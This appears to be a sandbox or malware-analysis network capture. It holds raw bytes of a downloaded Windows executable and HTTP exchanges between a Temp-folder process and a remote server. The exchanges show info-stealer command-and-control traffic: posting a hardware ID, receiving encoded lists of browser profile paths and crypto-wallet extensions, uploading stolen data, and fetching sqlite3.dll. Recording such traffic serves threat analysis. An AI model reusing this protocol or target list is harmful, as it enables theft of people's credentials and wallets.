                                                                                                                                                                                                                                    Data Ascii: A_'Yth(AI'Y`hu(A3'Yjhj\jpjdUQQL$$X]E]UQQQQ$ ]EYY]UVEPUQA^]QAUVEtV
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.307984114 CEST1289INData Raw: 00 53 53 ff 15 34 30 41 00 8d 45 c8 50 ff 15 14 30 41 00 53 53 53 ff 15 30 30 41 00 8d 85 b0 fb ff ff 50 53 ff 15 a4 30 41 00 53 53 ff 15 a0 30 41 00 8d 45 c4 50 53 8d 45 b0 50 53 ff 15 48 30 41 00 53 53 53 53 ff 15 5c 30 41 00 8b 45 f8 8b 0d 50
                                                                                                                                                                                                                                    Data Ascii: SS40AEP0ASSS00APS0ASS0AEPSEPSH0ASSSS\0AEP+}uS0AEEE]EEEEEEMEEEEMU3E3U:UGaUNt]MuE~_^[]V5PW=Dt
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308022976 CEST1289INData Raw: 55 b8 2b e8 9d 09 f7 65 f0 8b 45 f0 81 6d f4 75 6b 6d 57 b8 65 7f f8 62 f7 65 d0 8b 45 d0 81 6d f0 1a 01 37 1b 81 45 c8 65 b1 36 08 81 45 dc f6 3e 79 75 81 45 d8 02 56 5f 47 81 45 c0 d6 bd 17 3f 81 45 e4 12 5f 9d 36 b8 7b ea 48 5f f7 65 dc 8b 45
                                                                                                                                                                                                                                    Data Ascii: U+eEmukmWebeEm7Ee6E>yuEV_GE?E_6{H_eEEMWcm%>mzmmRQ6keEE%v;QeEQKeE)#eEtUeEeED7eEmI'D eEyuSeEoeEm
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308059931 CEST1289INData Raw: ff 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b f9 74 1d e8 49 00 00 00 39 45 08 72 13 8b cf e8 3d 00 00 00 03 47 10 3b 45 08 76 04 b0 01 eb 02 32 c0 5f 5d c2 04 00 68 9c 88 41 00 e8 c0 03 00 00 cc
                                                                                                                                                                                                                                    Data Ascii: 3;_^]1U}WtI9Er=G;Ev2_]hAhAU]faayrUQEPN3B;HF]P(AVSVuWe};su'3EOu;vW+
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308118105 CEST1289INData Raw: e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 63 0f ba e6 03 0f 83 b2 00 00 00 66 0f 6f 4e f4 8d 76 f4 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 0c 66
                                                                                                                                                                                                                                    Data Ascii: s~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fo
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308157921 CEST1289INData Raw: 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 4f 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8
                                                                                                                                                                                                                                    Data Ascii: pJutOtfofvJut*tvIutFGIuX^_$++QtFGIutvHuYAAQ AAUEu$#3]@]U
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308196068 CEST1289INData Raw: 00 54 2e 40 00 4c 2e 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 98 2e 40
                                                                                                                                                                                                                                    Data Ascii: T.@L.@DDDDDDDDDDDDDD$.@.@.@.@.@D$^_D$^_FGD$^_IFGFGD$^_t1|9u$r$40@$/@Ir+$8/@$
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308233976 CEST1289INData Raw: 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 cc cc cc cc cc 57 8b 7c 24 08 eb 6e 8d a4 24 00 00 00 00 8b ff 8b 4c 24 04 57 f7 c1 03 00 00 00 74 13 8a 01 83 c1 01 84 c0 74 3d f7 c1 03 00 00 00 75 ef 8b ff 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2
                                                                                                                                                                                                                                    Data Ascii: $+AL$+W|$n$L$Wtt=u~3tAt#tttyyyyL$ttfu~3tt4t'ttD$_fD
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308273077 CEST1289INData Raw: 08 8b 7d e4 56 e8 2a 1c 00 00 59 c3 55 8b ec 6a 40 ff 75 0c ff 75 08 e8 2c ff ff ff 83 c4 0c 5d c3 6a 0c 68 20 8f 41 00 e8 2e 28 00 00 33 db 89 5d e4 33 c0 8b 7d 08 85 ff 0f 95 c0 85 c0 75 18 e8 7b 15 00 00 c7 00 16 00 00 00 e8 01 15 00 00 83 c8
                                                                                                                                                                                                                                    Data Ascii: }V*YUj@uu,]jh A.(3]3}u{39Et}WXY!]G@uqWYtt`C@A@$u)tt`C@AB$to]u%W*
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480509043 CEST1289INData Raw: 50 e8 90 10 00 00 59 33 c0 eb 41 03 c0 50 e8 ac 25 00 00 89 06 59 85 c0 74 ed ff 75 fc 50 6a ff ff 75 08 6a 00 53 ff 15 54 30 41 00 85 c0 75 19 ff 15 58 30 41 00 50 e8 5a 10 00 00 ff 36 e8 c8 10 00 00 83 26 00 59 eb bd 33 c0 40 5e 5b 8b e5 5d c3
                                                                                                                                                                                                                                    Data Ascii: PY3AP%YtuPjujST0AuX0APZ6&Y3@^[]UQEPh@Aj0Ath@Auh0Atu]UuYu0AUQu&RYhjjjMjjj>U=@Ath@ASYtu


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    3192.168.2.449733185.172.128.76807516C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:14.075716019 CEST417OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECG
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 216
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 32 37 45 45 43 34 32 44 33 32 30 38 39 32 35 37 30 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 2d 2d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: ------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="hwid"BA827EEC42D32089257003------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="build"default10------KFIIJJJDGCBAAKFIIECG--
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:14.607377052 CEST347INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:14 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 152
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Data Raw: 4f 47 59 31 4e 7a 5a 6a 59 32 4a 6b 4d 44 45 77 5a 44 56 6b 59 6a 64 6b 4d 57 45 7a 4d 6a 55 32 4d 57 4d 35 5a 6a 45 32 59 7a 5a 6b 4e 47 52 69 59 6a 4d 35 5a 6d 4a 6c 4d 44 6c 69 59 7a 59 7a 59 7a 56 6a 4f 44 63 34 5a 47 55 32 4d 7a 41 30 4e 6a 51 7a 5a 44 59 30 5a 54 59 78 5a 6d 49 34 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                                                                                                                                                                                                                    Data Ascii: OGY1NzZjY2JkMDEwZDVkYjdkMWEzMjU2MWM5ZjE2YzZkNGRiYjM5ZmJlMDliYzYzYzVjODc4ZGU2MzA0NjQzZDY0ZTYxZmI4fGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:15.895415068 CEST469OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJE
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 268
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 2d 2d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: ------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="message"browsers------HJKJKKKJJJKJKFHJJJJE--
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.178347111 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:16 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 1520
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.178390980 CEST427INData Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39
                                                                                                                                                                                                                                    Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.180488110 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHD
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 267
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="message"plugins------AKKEGHJDHDAFHIDHCFHD--
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.462311983 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:16 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 5416
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.462368011 CEST1289INData Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64
                                                                                                                                                                                                                                    Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.462405920 CEST1289INData Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c
                                                                                                                                                                                                                                    Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.462503910 CEST1289INData Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62
                                                                                                                                                                                                                                    Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.462582111 CEST456INData Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57
                                                                                                                                                                                                                                    Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.687830925 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJE
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 8359
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.687913895 CEST8359OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63
                                                                                                                                                                                                                                    Data Ascii: ------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.997889042 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:16 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.260422945 CEST93OUTGET /15f649199f40275b/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.540066004 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:17 GMT
                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                    Content-Length: 1106998
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                    ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
